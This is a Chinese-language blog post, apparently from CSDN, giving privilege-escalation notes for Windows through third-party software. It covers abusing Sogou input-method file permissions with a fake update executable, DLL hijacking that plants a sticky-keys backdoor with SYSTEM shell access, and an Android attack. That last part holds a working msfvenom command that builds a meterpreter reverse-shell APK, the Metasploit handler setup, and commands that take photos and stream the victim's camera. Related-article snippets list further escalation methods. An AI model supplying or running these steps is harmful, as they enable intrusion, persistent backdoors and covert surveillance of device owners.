第三方提权

最新推荐文章于 2024-05-12 17:30:39 发布
最新推荐文章于 2024-05-12 17:30:39 发布
阅读量1.9k 收藏
点赞数 1
分类专栏: 提权 渗透测试 文章标签: web安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/song123sh/article/details/124229731
版权

第三方提权

可以进入注册表查看装了哪些软件

image-20220407231257040

搜狗输入法提权

image-20220407231500497

原理:通过搜狗输入法的权限不严格,在默认安装搜狗输入法时,权限赋予过大,everyone(所有)权限(绝对控制)

通过伪造exe文件,例如更新程序,在对方进行软件更新或内容更新时,自动执行提前写好的bat脚本(quick batch)

FileZilla、ftp、迅雷、搜狗输入法、vnc、老版本360等第三方软件的特别版本均存在此提权方法

LPK劫持(dll劫持)

一种是需要程序本身的dll,根据函数仿制一个dll

另一种是直接生成一个恶意dll,放在某一个目录下,对方重启程序后生效

前置条件:对方经常使用此软件(要重启软件),对方开远程桌面(端口可能被修改,在shell里看一下即可)

后门生效后,远控连接对方服务器,在登录界面5次shift键调用粘贴后输入提前设置好的命令,验证密码后弹出一个类似控制面板,可以对服务器进行操作,且cmd权限为system

对安卓手机渗透测试

kali中msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 R > shell.apk

生成后可以在Android Killer中做处理

软件名称

image-20220408000141532

在msf中设置payload

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST 192.168.43.105

set LPORT 4444

run

image-20220408001320898

拍照:webcam_snap

开摄像头:webcam_stream -i 1

查看安装的app:app_list

?

Shadow丶S
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
星外提权工具
07-23
寻找服务器上安装的第3方软件某些文件的权限问题来进行文件替换,将这些文件替换为我们的cmd.exe和cscript.exe来提权,经我测试发现以下服务器常用软件的某些文件权限为Everyone即为所有用户权限,可以修改,可以...
【权限提升】利用第三方应用Teamviewer&向日葵&Navivat-凭据
今天是几号的博客
02-18 740
远控类 利用向日葵漏洞提权 漏洞版本百度云链接 搭建: 为追求真实服务器环境,采用阿里云ECS弹性服务器搭建靶场(windows server2012 + phpstudy) 背景: 已有webshell权限,利用探针(查看端口,进程等)知道服务器安装了向日葵服务 tasklist /svc提权工具-CS 上传后门,会连会话,这里由于搭建原因忽悠是administrator权限,当做是普通用户权限,且无法正常提权至系统权限 利用CS插件上传向日葵提权工具 上传 执行 机器密文就是验证码,使用Python高版
权限提升-系统权限提升篇&数据库提权&Postsql&Redis&第三方软件提权&密码凭据&钓鱼文件
siu~
03-24 1344
1、数据库到Linux-数据库提权-Redis 3、数据库到Linux-数据库提权-PostgreSQL 4、计算机用户到系统-第三方软件-各类应用 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
Linux提权--第三方软件MYSQL数据库提权(WEB+本地)
最新发布
金灰的博客
05-12 851
免责声明:本文仅做技术交流与学习,非法搞事后果自负...
渗透怎么学?渗透测试中超全的提权思路来了!
bdfcfff77fa的博客
06-26 1080
尽量能够获取webshell,如果获取不到webshell可以在有文件上传的地方上传反弹shell脚本;或者利用漏洞(系统漏洞,服务器漏洞,第三方软件漏洞,漏洞)来获取shell。利用kali虚拟机msfVENOM编写反弹shell脚本被控制端发起的shell---通常用于被控制端因防火墙受限,权限不足、端口被占用。
Windows提权第三方应用
qq_61553520的博客
01-28 385
电脑(服务器)装的第三方应用越多,安全隐患越大。
Windows提权---第三方软件提权、Bypass UAC提权
qq_40012781的博客
07-03 1778
第三方软件提权、Bypass UAC提权
思域第三方app安装方法(提权)
哆啦安全
08-17 2165
1.USB A to A数据线1条 2.打开开发者模式,打开USB调试,解锁开发者模式,建立adb连接 3.提取白名单 https://github.com/timwr/CVE-2016-5195 ​ 编译生成dirtycow、run-as make root ​ adb push dirtycow run-as /data/local/tmp/ adb shell mount -o rw,remount /system cd /data/local/tmp...
第三方应用软件提权方法
m0_62207482的博客
03-09 341
3、Gene6 FTP 安全性测试(Gene6 FTP 默认安装路径是 C:\Program Files\Gene6 FTP Server\RemoteAdmin\Remote.ini 其中 Remote.ini 是主配置文件,管理员登录的 ip、端口和密码都存储在这。2、FlashFXP 安全性测试(攻击者只需通过 webshell 下载 quick.dat、sites.dat、stats.dat这三个文件进行本地替换,就可以用星号查看器直接查看连接密 码)9、服务替换安全性测试。8、启动项安全性测试。
【红蓝对抗】SQL Server提权1
08-03
提权类型包括系统提权、数据库提权第三方提权,本文聚焦于SQL Server的部分提权技术。 首先,了解SQL Server的关键系统库: 1. **master**数据库是整个SQL Server的核心,包含了所有配置信息、用户登录信息以及...
法客周年庆++之通杀Hzhost主机+和提权思路的总结
02-22
本篇文章主要总结了Hzhost主机的提权思路,包括信息收集、服务器软件利用、可写可执行目录查找和服务器上安装的第三方软件文件权限问题等多方面的知识点。 一、信息收集 信息收集是提权的关键环节,包括服务器是否...
红队测试之Linux提权小结1
08-03
6. **第三方服务**:利用系统中安装的不安全或未经充分审核的第三方服务进行提权。 【漏洞介绍与复现】 以Linux内核提权漏洞为例,如著名的“脏牛”漏洞,它暴露了Linux内核的内存管理问题,允许攻击者从低权限用户...
014-红队测试之Linux提权小结.pdf
09-20
Linux常见的提权攻击者们选择的下手点有多种,如内核漏洞、定时任务、Suid文件、sudo配置错误、NFS共享、第三方服务等。这些下手点在攻击者的视角下,都是可怕的漏洞,但是对普通的IT运维人员来说,这些“下手点”...
LINUX提权第三方服务提权
ALLEN'Blog
12-14 651
总结了一下第三方服务器提权,相比于其他提权方法还是挺简单的,只需要找到对应第三方服务的漏洞即可尝试提权,当然我们也可以在MSF里找到对应的payload,仔细学习一下还是挺好理解的,本文就讲到这里,喜欢的话不妨一键三连。
app提权的方法
ani_di的专栏
06-29 3717
做Mac软件,需要以root帐户运行,所以需要提升app的权限。我记得原来在windows下只需要改一个编译选项即可,不过mac里就不行了。经过一番google,找到了2种提权方法: 1. 通过脚本等执行shell 这可能是最快能想到的方法,毕竟sudo命令太常用了。实现这个方案用applescript比较合适,一句代码即可搞定do shell script "xxxx" with
【学习笔记】-提权篇(保姆级)
rm -rf *
01-30 476
内网渗透(详细、初级)、提权手段归纳
Linux通过第三方应用提权实战总结
zhangge3663的博客
02-20 1522
Linux提权,前提是拿到了一个低权限的账号,能上传和下载文件,主要思路有: 1、内核提权。网上各种大佬的payload很多,关键在于要能找到利用哪个exp以及具体如何利用。省力点的方法是用searchsploit或者linux-exploit-suggester.sh来查找,熟悉之后难度也不大。 2、suid提权。这里也包含了sudo这种方式,两种方法的思路都是一样的,区别在于suid针对单个程序,sudo针对某个用户。这类提权方式的主要思路是:管理员授权普通用户去执行 root 权限的操作,而不需要
PendingIntent重定向:一种针对安卓系统和流行App的通用提权方法——BlackHat EU 2021议题详解(上)
OPPO数智技术
03-15 6548
1 简介 1.1 Intent 安卓系统中,Intent是在组件间传递的通信消息,用于执行打开Activity、发送广播、启动服务等动作,而Intent对象内部的字段则规定了Intent发送的目的组件,以及执行动作的具体内容,包括action、category、data、clipdata、package、flag、extra、component和selector。 其中component和selector用于设置Intent的目的组件,规定Intent发送给谁。按照是否设置component和selecto
java 第三方登陆
02-19
Java第三方登录是指使用第三方平台(如微信、QQ、微博等)的账号进行登录认证。通过第三方登录,用户可以使用自己在第三方平台上已有的账号信息来快速登录其他网站或应用,避免了繁琐的注册流程和记忆多个账号密码的麻烦。 在Java中,可以使用一些开源的第三方登录库来实现第三方登录功能,例如Spring Social、OAuth2等。这些库提供了与各大第三方平台进行交互的API,并封装了认证流程和授权流程,简化了开发过程。 具体实现步骤如下: 1. 在第三方平台上注册开发者账号,并创建应用,获取应用的App ID和App Secret等必要信息。 2. 在Java项目中引入相应的第三方登录库的依赖。 3. 配置第三方登录的回调URL,用于接收第三方平台返回的认证信息。 4. 在用户点击第三方登录按钮时,跳转到第三方平台的登录页面。 5. 用户在第三方平台上进行登录并授权后,第三方平台会将认证信息回调到之前配置的回调URL上。 6. 在回调URL对应的处理方法中,通过第三方登录库提供的API获取用户的唯一标识和其他相关信息。 7. 根据获取到的用户信息,进行登录认证或注册新用户的操作。 需要注意的是,不同的第三方平台可能有不同的认证流程和API调用方式,具体实现细节可以参考相应的第三方登录库的文档和示例代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shadow丶S

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值